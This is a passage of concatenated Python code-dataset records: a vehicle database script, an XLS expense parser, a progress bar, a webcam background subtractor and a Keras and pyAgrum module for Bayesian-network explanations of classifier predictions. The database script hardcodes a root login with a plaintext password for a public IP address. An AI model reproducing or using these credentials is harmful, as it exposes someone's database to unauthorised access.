301):\n                    print(\"%\"*32)\n                    print(end_time)\n                    # writenodetrace(base_id, x, y, end_time)\n                    vehicle_number[end_time] += 1\n        print(\"vehicleID \" + str(base_id) + \" complete\")\n        base_id += 1\n    print(\"#\"*64)\n    print(\"begin number is \" + str(begin_vehicle_number))\n    print(\"end number is \" + str(end_vehicle_number))\n    for i in range(300):\n        process_vehicle_number[str(i)] = vehicle_number[i]\n    return process_vehicle_number\n\n\n\nif __name__ == '__main__':\n    # connect to the database\n    connect = pymysql.Connect(\n        host='120.78.167.211',\n        port=3306,\n        user='root',\n        passwd='King@102321',\n        db='vehicleBJ',\n        charset='utf8'\n    )\n\n    # get a cursor\n    cursor = connect.cursor()\n    print(\"connect DB success\")\n    sqlcreattem()\n    # print(get_origin_vehicle_number_in_seconds())\n    print(\"*\"*32)\n    # print(get_process_vehicle_number_in_seconds())\n    print(get_vehicle_info())\n","sub_path":"2019-09-06/bjpm.py","file_name":"bjpm.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"}
{"seq_id":"429109199","text":"import pandas as pd\nimport os\n\nfrom parse_result import ParseResult\nfrom transaction import Transaction\n\n\ndef extract_expenses(df):\n    expenses = df[pd.notna(df.expense)].copy()\n    return list(expenses.T.to_dict().values())\n
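# transposing first makes to_dict key by row index, so this yields one dict per expense row\n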
\n\ndef parse_xls(filename) -> ParseResult:\n    df = pd.read_excel(os.getcwd() + \"/\" + filename)\n    size = len(df)\n    df = df[6:size]\n    df = df.rename(\n        columns={\"Unnamed: 1\": \"date\", \"Unnamed: 2\": \"description\", \"Unnamed: 4\": \"expense\", \"Unnamed: 5\": \"income\",\n                 \"Unnamed: 6\": \"balance\"})\n    df = df[['date', 'description', 'expense', 'income', 'balance']]\n\n    initial_balance = round(df[df.description == 'SALDO ANTERIOR'].balance.values[0])\n    end_balance = round(df[df.description == 'SALDO FINAL'].balance.values[0])\n    expenses = extract_expenses(df)\n\n    return ParseResult(initial_balance, end_balance, expenses, [])\n","sub_path":"xls_parser.py","file_name":"xls_parser.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"}
{"seq_id":"471978387","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport time\n\ndef count_file_lines(file):\n\t#tic = time.clock()\n\t\t\n\tfile_len = sum(1 for line in file)\n\tfile.seek(0,0)\n\t\n\t#toc = time.clock()\n\t#print toc-tic\n\n\treturn file_len\n\ndef progress_bar(current_iteration, total):\n\twhole_len = 25\n\t\n\tfill = '█'\n\tpercentage = (current_iteration/float(total))*100\n\n\tfill_len = whole_len*current_iteration//total\n\n\tsys.stdout.write(\"\\rProgress [{0:s}{1:s}] {2:f}%\".format(fill*fill_len, '-'*(whole_len-fill_len), percentage))\n\tsys.stdout.flush()  # flush so the carriage-return progress line renders immediately\n","sub_path":"ProjectKindaStuff/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"}
{"seq_id":"428460145","text":"import numpy as np\nimport cv2 as cv\n\nwebcam = cv.VideoCapture(0)\n\nkernel = cv.getStructuringElement(cv.MORPH_ELLIPSE,(3,3))\nfgbg = cv.createBackgroundSubtractorMOG2()\n\nwhile True:\n    _,frame = webcam.read()\n\n    fgmask = fgbg.apply(frame)\n    fgmask = cv.morphologyEx(fgmask, cv.MORPH_OPEN, kernel)\n\n    cv.imshow('frame',fgmask)\n    if ord(\"q\") == cv.waitKey(1):\n        webcam.release()\n        cv.destroyAllWindows()\n        break\n\n","sub_path":"N40 Webcam background change.py","file_name":"N40 Webcam background change.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"187264460","text":"\n# update for tensorflow\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport random as rn\nimport re\nimport warnings\nimport csv\n\n\nimport tensorflow as tf\n# Force TensorFlow to run single-threaded.\n# Multiple threads are a potential source of non-reproducible research results.\nsession_conf = tf.compat.v1.ConfigProto( intra_op_parallelism_threads=1, inter_op_parallelism_threads=1 )\n
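# added note: session_conf is built but never applied here; wiring it up would need\n# something like tf.compat.v1.keras.backend.set_session(\n#     tf.compat.v1.Session(config=session_conf))  # hypothetical, not in the original\n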
\n# tf.set_random_seed() will make random number generation in the TensorFlow backend\n# have a well-defined initial state\n# more details: https://www.tensorflow.org/api_docs/python/tf/set_random_seed\ntf.compat.v1.set_random_seed(515)\n\n# keras / deep learning libraries\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.optimizers import Nadam\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom tensorflow.keras.utils import plot_model\n\n# callbacks\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.pyplot import figure\nimport matplotlib.image as mpimg\nimport pylab as pl\nfrom pylab import savefig\nplt.style.use('seaborn-deep')\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler,MinMaxScaler\n\n# Bayesian networks\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom pylab import *\nimport pyAgrum as gum\nimport pyAgrum.lib.notebook as gnb\n\n# for classification purposes\nfrom pyAgrum.lib.bn2roc import showROC\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nfrom sklearn.metrics import roc_curve, auc\n\nclass LearningTester(object):\n    test = \"test! Hello!\"\n\n\n# RECALL -----------------------------------------------------------------------------\n#\ndef recall_m(y_true, y_pred):\n    \"\"\"Computes the recall measure of an evaluation setting\n\n    Parameters\n    ----------\n    y_true : list\n        list of ground-truth labels\n    y_pred : list\n        list of predictions from the blackbox\n\n    Returns\n    -------\n    recall : tensor\n        the recall computed from the predictions and the ground truths\n    \"\"\"\n    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n    possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n    recall = true_positives / (possible_positives + K.epsilon())\n    return recall\n\n# PRECISION ---------------------------------------------------------------------------\n#\ndef precision_m(y_true, y_pred):\n    \"\"\"Computes the precision measure of an evaluation setting\n\n    Parameters\n    ----------\n    y_true : list\n        list of ground-truth labels\n    y_pred : list\n        list of predictions from the blackbox\n\n    Returns\n    -------\n    precision : tensor\n        the precision computed from the predictions and the ground truths\n    \"\"\"\n    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n    predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n    precision = true_positives / (predicted_positives + K.epsilon())\n    return precision\n\n# F1 ------------------------------------------------------------------------------------\n# Computes the F1 measure of an evaluation setting\n# y_true: list of groundtruth labels\n# y_pred: list of predictions from blackbox\ndef f1_m(y_true, y_pred):\n    precision = precision_m(y_true, y_pred)\n    recall = recall_m(y_true, y_pred)\n    return 2*((precision*recall)/(precision+recall+K.epsilon()))\n\n
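# added note: to monitor these custom metrics during training, pass the callables in\n# create_model's metrics list, e.g. metrics=['accuracy', f1_m, precision_m, recall_m]\n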
By default it is used the 'nadam' algorithm\n# metrics: a list of strings specifying the metrics to be evaluated ('accuracy', 'f1', 'recall','precision')\ndef create_model(input_dim, output_dim, nodes, hidden_layers=1, loss_func='categorical_crossentropy', optim='nadam', metrics=['accuracy'], name='model'):\n \n model = Sequential(name=name)\n model.add( Dense(nodes, input_dim=input_dim, activation='relu')) # input layer\n for i in range(hidden_layers): # hidden layers\n model.add(Dense(nodes, activation='relu')) \n model.add(Dense(output_dim, activation='softmax')) # output layer\n\n if( optim == \"nadam\" ): # Compile model\n optim = keras.optimizers.Nadam(lr=0.0001, beta_1=0.9, beta_2=0.999)\n\n model.compile(loss=loss_func, optimizer=optim, metrics=metrics)\n return model\n \n# GRID_SEARCH -----------------------------------------------------------------------------\n# Generates a set of models with different configurations, ranging from an\n# initial number of neurons to a maximum number of neurons\n# start_nodes: an integer specifying the initial number of neurons to generate a model from\n# max_nodes: an integer specifying the maximum number of neurons to generate a model from\n# max_hlayers: an integer specifying the maximum number of hidden layers to generate a model from\n# debug: boolean that acts as a flag. If True, it displays the characteristics of each model\n# metrics: a list of strings with the metrics to be evaluated \ndef grid_search_model_generator(n_features, n_classes, start_nodes = 1, max_nodes = 12, max_hlayers = 5, debug = False, metrics = ['accuracy'] ):\n\n models = []\n\n # generate different models with different neurons and different hidden layers\n for neurons in range(start_nodes, max_nodes+1):\n for hidden_layer in range(1, max_hlayers+1):\n model_name = \"model_h\" + str(hidden_layer) + \"_N\"+str(neurons)\n model = create_model(n_features, n_classes, neurons, hidden_layer, name=model_name, metrics = metrics)\n models.append( model ) # add the generated model to a list\n\n # plot general information for each model\n if( debug ): \n for model in models:\n model.summary()\n\n return models\n\n# PERFORM_GRID_SEARCH -------------------------------------------------------------------\n# given a list of models with different configurations, fit the data to the models,\n# and evaluate the model. 
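(a minimal\n# usage sketch for the two helpers above -- the values are illustrative, not taken\n# from the original code:\n#     models = grid_search_model_generator(n_features=4, n_classes=3,\n#                                         start_nodes=2, max_nodes=4, max_hlayers=2)\n# builds (4-2+1)*2 = 6 compiled models, combining 2 to 4 neurons per layer\n# with 1 or 2 hidden layers.)\n# 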
This function returns a list of training histories for each model\n# models: list of models\n# X_train: \n# Y_train: \n# X_validation: \n# Y_validation: \n# X_test: \n# Y_test: \n# batch_size: \n# epochs: \ndef perform_grid_search( models, path, dataset_name, X_train, Y_train, X_validation, Y_validation, X_test, Y_test, batch_size, epochs ):\n\n\tHISTORY_DICT = {}\n\t\n\t# define the callebacks to take into consideration during training\n\t# stop training when convergence is achieved after 10 iterations\n\tearly_stop = EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='min')\n\t\n\t# save the best model after every epoch\n\tmodel_checkpoint = ModelCheckpoint(path + \"training/\" + dataset_name + \"/model_{epoch:02d}-{val_loss:.2f}.h5\", monitor='val_loss', verbose=0, save_best_only=True, mode='min')\n\tcallbacks_list = [early_stop, model_checkpoint]\n\t\n\t# grid search over each model\n\tfor model in models:\n\t\t\n\t\tprint('MODEL NAME:', model.name)\n\t\thistory_callback = model.fit(X_train, Y_train, batch_size = batch_size, epochs = epochs, verbose=0, validation_data=(X_validation, Y_validation), callbacks=callbacks_list)\n\t\tscore_test = model.evaluate( X_test, Y_test, verbose=0 )\n\t\tscore_train = model.evaluate( X_train, Y_train )\n\t\t\n\t\tprint('Test loss: ', format(score_test[0], '.4f'), '\\tTrain loss: ', format(score_train[0], '.4f') )\n\t\tprint('Test accuracy: ', format(score_test[1], '.4f'), '\\tTrain accu: ', format(score_train[1], '.4f') )\n\t\tprint('Abs accuracy: ', format( np.abs( score_test[1] - score_train[1] ), '.4f'))\n\t\tprint('Abs loss: ', format( np.abs( score_test[0] - score_train[0] ), '.4f'))\n\t\tprint('\\n###########################################################\\n')\n\t\t\n\t\tHISTORY_DICT[model.name] = [history_callback, model]\n\t\n\treturn HISTORY_DICT\n\n# SAVE_MODEL -----------------------------------------------------------------------------\n# saves a trained model into a json and hdf5 file\n# model: model to be saved\n# model_name: string with model name\n# path: string with path to save\ndef save_model( model, model_name, path ):\n\t# serialize model to JSON\n model_json = model.to_json()\n with open(path + model_name+\"_DUO.json\", \"w\") as json_file:\n json_file.write(model_json)\n json_file.close()\n\n # serialize weights to HDF5\n model.save_weights( path + model_name+\"_DUO.h5\")\n print(\"Saving files:\")\n print(path + model_name+\"_DUO.json\")\n print(path + model_name+\"_DUO.h5\")\n print(\"Model saved to disk\") \n\n# SAVE_MODEL_HISTORY -------------------------------------------------------------------\n# saves a trained model into a csv file\n# model_hist: history of the model to be saved\n# model_name: string with model name\n# path: string with path to save\ndef save_model_history( model_hist, model_name, path ):\n file = open(path + model_name + \"_hist.csv\", \"w\")\n w = csv.writer( file )\n \n for key, val in model_hist.history.items():\n w.writerow([key, val])\n \n file.close()\n print(path + model_name+\"_DUO.h5\")\n print(\"Model history saved to disk\") \n\n# LOAD_MODEL_HISTORY ------------------------------------------\n# loads a saved model history into memory\n# model_name: the name of the model\n# path: path to model history\ndef load_model_history( model_name, path):\n\n model_hist_loaded = {}\n values = []\n\n # load dictionary\n r = open( path + model_name + \"_hist.csv\", \"r\").read()\n for line in r.split(\"\\n\"):\n if(len(line) == 0):\n continue\n \n metric = line.split(\",\\\"[\")[0] # extract 
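metrics\n # (each saved row from save_model_history is expected to look like:\n #    loss,\"[0.69, 0.52, ...]\"\n # i.e. a metric name, a comma, then a quoted Python list of floats,\n # which is the shape this parsing relies on)\n # extract 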
metrics\n values_str = line.split(\",\\\"[\")[1].replace(\"]\\\"\",\"\").split(\", \") # extract validation values\n values = [float(val_str) for val_str in values_str]\n model_hist_loaded.update( {metric : values} )\n \n return model_hist_loaded\n\n# LOAD_MODEL ------------------------------------------\n# loads a saved model into memory\n# model_name: the name of the model\n# path: path to model history \ndef load_model( model_name, path ):\n json_file = open( path + model_name + \"_DUO.json\", 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n\n # load weights into new model\n loaded_model = model_from_json(loaded_model_json)\n loaded_model.load_weights(path + model_name + \"_DUO.h5\")\n print(\"Loaded model from disk\")\n \n return loaded_model\n\ndef plot_model_history( model_history, metric ):\n\n plt.plot(model_history[ metric.lower() ], label='train')\n plt.plot(model_history[\"val_\" + metric.lower()], label='validation')\n plt.ylabel(metric)\n plt.xlabel('Number of Epochs')\n plt.ylim([0, 1])\n plt.legend()\n plt.show()\n\ndef plot_ROC_Curve( model, X, Y, n_classes):\n\n Y_pred_proba = model.predict(X)\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(Y[:, i], Y_pred_proba[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Plot of a ROC curve for a specific class\n for i in range(n_classes):\n plt.figure()\n plt.plot(fpr[i], tpr[i], label='ROC curve (area = %0.2f)' % roc_auc[i])\n plt.plot([0, 1], [0, 1], 'k--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic example')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n# ENCODE_DATA --------------------------------------------------------------------------\n# Applies one hot encoder to data\n# data: a dataframe\n# class_var: string with class variable name\ndef encode_data(data, class_var):\n\n\tfeature_names = data.drop([class_var], axis=1).columns.tolist()\n\t\n\tX = data[ feature_names ].values\n\ty = data[class_var].values\n\n\tn_features = X.shape[1]\n\tn_classes = len(data[class_var].unique())\n\t\n\t# create numerical encoding for attribute species\n\tenc = OneHotEncoder()\n\tY = enc.fit_transform(y[:, np.newaxis]).toarray()\n\n\t# Scale data to have mean 0 and variance 1 \n\t# which is importance for convergence of the neural network\n\tscaler = MinMaxScaler()\n\tX_scaled = scaler.fit_transform(X)\n\t\n\treturn X_scaled, Y, enc, scaler\n\n# LOAD_TRAINING_DATA ---------------------------------------------------------------------\n# loads into a multiarray format a training set previously saved in a .csv file\n# dataset_path: string containing the path where the files will be saved\ndef load_training_data( dataset_path ):\n\tX_train = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Xtrain.csv\", index_col=False).values\n\tX_test = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Xtest.csv\", index_col=False).values\n\tX_validation =pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Xvalidation.csv\",index_col=False).values\n\tY_train = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Ytrain.csv\",index_col=False).values\n\tY_test =pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Ytest.csv\", index_col=False).values\n\tY_validation = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Yvalidation.csv\", index_col=False).values\n\t\n\treturn X_train, Y_train, 
X_test, Y_test, X_validation, Y_validation\n\n# GENERATE_SAVE_TRAINING_DATA ------------------------------------------------------------\n# \n# dataset_path: string containing the path where the files will be saved\n# X: NxM matrix representing the training data\n# Y: NxC matrix representing the OneHotEconder of C classes\ndef generate_save_training_data( dataset_path, X, Y):\n\t\"\"\"Generates training, test and validation sets and stores this information into files \n\t\n\tParameters\n\t----------\n\tdataset_path : str\n\t\tThe file location of the spreadsheet\n\tsamples : int, optional\n\t\tThe number of permutations to generate from the original vector (default is 300)\n\tvariance : int, optional\n\t\tQuantity to permute in each feature (default is 0.25)\n\t\t\n\tReturns\n\t-------\n\tpermutations : matrix\n\t\ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n\t\toriginal vector\n\t\"\"\"\n\t# generate train, test and validation sets\n\tX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=515)\n\tX_validation, X_test, Y_validation, Y_test = train_test_split(X_test, Y_test, test_size=0.5, random_state=515)\n\t\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Xtrain.csv\", X_train, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Xtest.csv\", X_test, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Xvalidation.csv\", X_validation, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Ytrain.csv\", Y_train, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Ytest.csv\", Y_test, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Yvalidation.csv\", Y_validation, delimiter=\",\")\n\t\n \n\n##############################################################################\n#\t\t\t\t\t\tBAYESIAN NETWORK EXPLANATIONS\t\t\t\t\t\t #\n##############################################################################\n\n\ndef compute_perm_range(feat, variance = 0.25):\n \"\"\"\n \n Parameters\n ----------\n feat : float\n \tValue of a feature to be permuted\n samples : int, optional\n The number of permutations to generate from the original vector (default is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n min_range : float\n \tminimum value that a feature can be permuted\n max_range : float\n \tmaximum value that a feature can be permuted\n \"\"\"\n\n min_range = feat - variance\n max_range = feat + variance\n \n # features are scaled between 0 and 1\n # if the permutation make the feature negative, this values is set to 0\n if( min_range < 0 ):\n min_range = 0\n # if the permutation make the feature bigger than 1, this values is set to 1 \n if( max_range > 1 ):\n max_range = 1\n \n return min_range, max_range \n\n\n# PERMUTE_SINGLE_FEATURES_____________________________________________________________\n# \ndef permute_single_features( my_array, samples = 300, variance = 0.25 ):\n \"\"\"Given a single array from which one pretends to generate local explanations from\n Draw samples from a uniform distribution within a range of feature_val +- variance\n Returns a matrix with a number of samples (by default 300) with permutations \n of each feature of the input vector\n \n Parameters\n ----------\n my_array : np.array\n \tThe datapoint to be locally explained\n samples : int, optional\n The number of permutations to generate from the original vector (default 
is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\"\n\n # permutation result list\n permutations = []\n # just keeping a controlled number of decimal places\n my_array = np.round(my_array,4)\n \n # keep a copy of the original array, since we will be changing the features\n my_array_backup = my_array.copy()\n \n # extract number of features\n num_features = my_array.shape[0]\n \n # add original vector to dataframe\n permutations.append( my_array_backup.tolist() )\n \n # for each feature of the input feature vector,\n for feat in range(0, num_features): \n \n \t# get feature value\n \tmy_array = my_array_backup.copy()\n \tfeature_val = my_array[feat]\n \t\n \t# set permutation of feature between [ feat - variance ; feat + variance ]\n \tmin_range, max_range = compute_perm_range( feature_val, variance )\n \t\n \t# generate sample of random features within a range\n \tfor perm in range(0, int(round(samples/num_features, 0))):\n \t\t# set the new vector\n \t\tmy_array[feat] = np.abs(np.round(rn.uniform(min_range, max_range),4))\n \t\tpermutations.append( my_array.tolist() )\n \t\t\n #rn.shuffle(permutations)\n return permutations\n\n\ndef check_input( value ):\n if value < 0:\n return 0\n if value > 1:\n return 1\n\n return value\n\ndef permute_single_features_circle( my_array, samples = 300, variance = 0.25 ):\n\n # permutation result list\n permutations = []\n # just keeping a controlled number of decimal places\n my_array = np.round(my_array,4)\n\n # keep a copy of the original array, since we will be changing the features\n my_array_backup = my_array\n\n # extract number of features\n num_features = my_array.shape[0]\n\n # add original vector to dataframe\n permutations.append( my_array_backup.tolist() )\n\n # for each feature of the input feature vector,\n for perm in range(0, int(round(samples/num_features, 0))):\n \n # generate sample of random features within a range\n \n temp1 = []\n temp2 = []\n for feat in range(0, num_features): \n # numpy's pi/cos/sin are used here: the math module is never\n # imported in this file, so math.pi would raise a NameError\n theta = 2*np.pi*np.random.random()\n feature_val = my_array[feat]\n\n # set the new vector\n temp1.append( check_input( feature_val + np.round(np.random.uniform(0, variance),4)*np.cos(theta) ))\n temp2.append( check_input( feature_val + np.round(np.random.uniform(0, variance),4)*np.sin(theta) ))\n\n permutations.append( temp1 )\n permutations.append( temp2 )\n \n #rn.shuffle(permutations)\n return permutations[0:samples]\n\n\n\n# LEARNBN -------------------------------------------\n#\ndef learnBN( file_path, algorithm = \"Hill Climbing\" ):\n \"\"\"Learns a Bayesian network from a (discretized) dataset stored in a CSV file,\n using the structure learning algorithm selected by the caller\n \n Parameters\n ----------\n file_path : str\n \tpath to the CSV file with the discretized data\n algorithm : str, optional\n \tstructure learning algorithm: \"Hill Climbing\" (default), \"Local Search\",\n \t\"3off2\" or \"miic\"\n \t\n Returns\n -------\n [bn, infoBN, essencGraph] : list\n \tthe learned Bayesian network, its information summary and its essential graph\n \"\"\"\n\n learner = gum.BNLearner( file_path )\n \n if( algorithm == \"Hill 
Climbing\"):\n print(\"Selecting Greedy Hill Climbing Algorithm\")\n learner.useGreedyHillClimbing()\n \n if( algorithm == \"Local Search\" ):\n print(\"Selecting Local Search Algorithm\")\n bn = learner.useLocalSearchWithTabuList()\n \n if( algorithm == \"3off2\"):\n print(\"Selecting 3Off2 Algorithm\")\n learner.use3off2()\n \n if( algorithm == \"miic\" ):\n print(\"Selecting MIIC Algorithm\")\n learner.useMIIC()\n \n learner.learnBN()\n \n bn = learner.learnBN()\n essencGraph = gum.EssentialGraph( bn )\n infoBN = gnb.getInformation( bn ) \n \n return [ bn, infoBN, essencGraph ]\n\n# DISCRETIZE_DATAFRAME -------------------------------------------------------\n#\n#\ndef discretize_dataframe( df, class_var, num_bins=4 ):\n \"\"\"Given a dataframe with continuous values, convert the continuous values into discrete ones\n by splitting the data into bins and by computing the respective quartiles\n \n Parameters\n ----------\n df : pd.DataFrame\n \tThe datapoint to be locally explained\n class_var : str\n The number of permutations to generate from the original vector (default is 300)\n num_bins : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\" \n r=np.array(range(num_bins+1))/(1.0*num_bins)\n \n # quantiles are building using pandas.qcut\n # The \"class\" column is just copied.\n l=[]\n for col in df.columns.values:\n \n if col!=class_var:\n l.append( pd.DataFrame( pd.qcut( df[col],r, duplicates='drop',precision=2),columns=[col]))\n else:\n l.append( pd.DataFrame( df[col].values,columns=[col]))\n \n treated = pd.concat(l, join='outer', axis=1)\n return treated\n\n# SAVE_DISCRETIZED_DATAFRAME ---------------------------------------------------\n#\ndef save_discretized_dataframe(indx, df_model, model_type, perm_type, bins, dataset_name, path, class_var):\n \"\"\"Given a single array from which one pretends to generate local explanations from\n Draw samples from a uniform distribution within a range of feature_val +- variance\n Returns a matrix with a number of samples (by default 300) with permutations \n of each feature of the input vector\n \n Parameters\n ----------\n my_array : np.array\n \tThe datapoint to be locally explained\n samples : int, optional\n The number of permutations to generate from the original vector (default is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\" \n file_path = path + dataset_name + \"/\" + str(indx) + \"/\" + re.sub( r\"\\.\\w+\", \"\", dataset_name ) + \"_\" + model_type +\"_INDX_\" + str(indx) + \"_\" + perm_type +\".csv\"\n df_discr = discretize_dataframe( df_model, bins, class_var )\n \n print(\"Saving discretized dataset into: %s\\n\" %(file_path))\n df_discr.to_csv( file_path, index=False)\n\n\n# WRAP_INFORMATION -------------------------------------------\n#\ndef wrap_information( local_data_dict ):\n \n true_positives = []\n true_negatives = []\n false_positives = []\n false_negatives = []\n for instance in local_data_dict:\n \n # wrap up true positives\n if( instance['prediction_type'] == 'TRUE POSITIVE'):\n true_positives.append(instance)\n\n # wrap up true negatives\n if( instance['prediction_type'] == 'TRUE NEGATIVE' ):\n true_negatives.append(instance)\n \n 
# wrap up false positives\n if( instance['prediction_type'] == 'FALSE POSITIVE' ):\n false_positives.append(instance)\n \n # wrap up false negatives\n if( instance['prediction_type'] == 'FALSE NEGATIVE' ):\n false_negatives.append(instance)\n \n return true_positives, true_negatives, false_positives, false_negatives\n \n\n# GENERATE_PERMUTATIONS -------------------------------------------\n#\ndef generate_permutations( instance, labels_lst, feature_names, class_var, encoder, scaler, model, samples = 300, variance = 0.25):\n \n # get datapoint in scaled feature space\n local_datapoint = np.array(instance['scaled_vector'])\n # get datapoint in original feature space\n local_datapoint_orig = np.array(instance['original_vector'])\n \n # permute features\n permutations = permute_single_features( local_datapoint, samples = samples, variance = variance )\n #permutations = permute_single_features_circle( local_datapoint, samples = samples, variance = variance )\n \n # convert permutations to original feature space\n permutations_orig = scaler.inverse_transform( permutations )\n \n # compute predictions for each permuted instance\n predictions = encoder.inverse_transform( model.predict( permutations ) )\n \n # convert prediction classes to labels\n labelled_predictions = [ labels_lst[ int(predictions[indx][0]) ] for indx in range(0, len(predictions))]\n \n # add all this information to a single dataframe\n df_local_permutations = pd.DataFrame( permutations_orig, columns = feature_names )\n\n # add class variable to dataframe\n df_local_permutations[ class_var ] = labelled_predictions\n \n return df_local_permutations\n\n# GEBERATE_BN_EXPLANATIONS ------------------------------------------------------------\n#\ndef generate_BN_explanations(instance, label_lst, feature_names, class_var, encoder, scaler, model, path, dataset_name ):\n\n # necessary for starting Numpy generated random numbers in an initial state\n np.random.seed(515)\n\n # Necessary for starting core Python generated random numbers in a state\n rn.seed(515)\n\n indx = instance['index']\n prediction_type = instance['prediction_type'].lower()+\"s\"\n prediction_type = prediction_type.replace(\" \", \"_\")\n \n # generate permutations\n df = generate_permutations( instance, label_lst, feature_names, class_var, encoder, scaler, model)\n\n # discretize data\n df_discr = discretize_dataframe( df, class_var, num_bins=4 )\n\n # save discretised dataframe (for debugging and reproduceability purposes)\n path_to_permutations = path + \"feature_permutations/\" + dataset_name.replace(\".csv\",\"\") + \"/\" + prediction_type + \"/\" + str(indx) + \".csv\"\n df_discr.to_csv( path_to_permutations, index=False)\n\n # normalise dataframe\n normalise_dataframe( path_to_permutations )\n\n # learn BN\n bn, infoBN, essencGraph = learnBN( path_to_permutations.replace(\".csv\", \"_norm.csv\") )\n\n # perform inference\n inference = gnb.getInference(bn, evs={},targets=df_discr.columns.to_list(), size='12')\n\n # show networks\n gnb.sideBySide(*[bn, inference, infoBN ],\n captions=[ \"Bayesian Network\", \"Inference\", \"Information Network\" ])\n\n # save to file\n path_to_explanation = path + \"explanations/\" + dataset_name.replace(\".csv\", \"\") + \"/BN/\" + prediction_type + \"/\"\n gum.lib.bn2graph.dotize( bn , path_to_explanation + str(indx) + \"_BN\" )\n gum.saveBN(bn,path_to_explanation + str(indx) + \"_BN.net\" )\n\n return [bn, inference, infoBN]\n \n \n# GEBERATE_BN_EXPLANATIONSMB ------------------------------------------------------------\n#\ndef 
generate_BN_explanationsMB(instance, label_lst, feature_names, class_var, encoder, scaler, model, path, dataset_name, variance = 0.1, algorithm = \"Hill Climbing\" ):\n\n # necessary for starting Numpy generated random numbers in an initial state\n np.random.seed(515) \n\n # Necessary for starting core Python generated random numbers in a state\n rn.seed(515)\n\n indx = instance['index']\n prediction_type = instance['prediction_type'].lower()+\"s\"\n prediction_type = prediction_type.replace(\" \", \"_\")\n \n # generate permutations\n df = generate_permutations( instance, label_lst, feature_names, class_var, encoder, scaler, model, variance = variance)\n\n # discretize data\n df_discr = discretize_dataframe( df, class_var, num_bins=4 )\n\n # save discretised dataframe (for debugging and reproduceability purposes)\n path_to_permutations = path + \"feature_permutations/\" + dataset_name.replace(\".csv\",\"\") + \"/\" + prediction_type + \"/\" + str(indx) + \".csv\"\n df_discr.to_csv( path_to_permutations, index=False)\n\n # normalise dataframe\n normalise_dataframe( path_to_permutations )\n\n # learn BN\n bn, infoBN, essencGraph = learnBN( path_to_permutations.replace(\".csv\", \"_norm.csv\"), algorithm = algorithm)\n\n # perform inference\n inference = gnb.getInference(bn, evs={},targets=df_discr.columns.to_list(), size='12')\n \n # compute Markov Blanket\n markov_blanket = gum.MarkovBlanket(bn, class_var)\n \n # show networks\n # gnb.sideBySide(*[bn, inference, markov_blanket ],\n # captions=[ \"Bayesian Network\", \"Inference\", \"Markov Blanket\" ])\n\n # save to file\n path_to_explanation = path + \"explanations/\" + dataset_name.replace(\".csv\", \"\") + \"/BN/\" + prediction_type + \"/\"\n gum.lib.bn2graph.dotize( bn , path_to_explanation + str(indx) + \"_BN\" )\n gum.saveBN(bn,path_to_explanation + str(indx) + \"_BN.net\" )\n\n return [bn, inference, 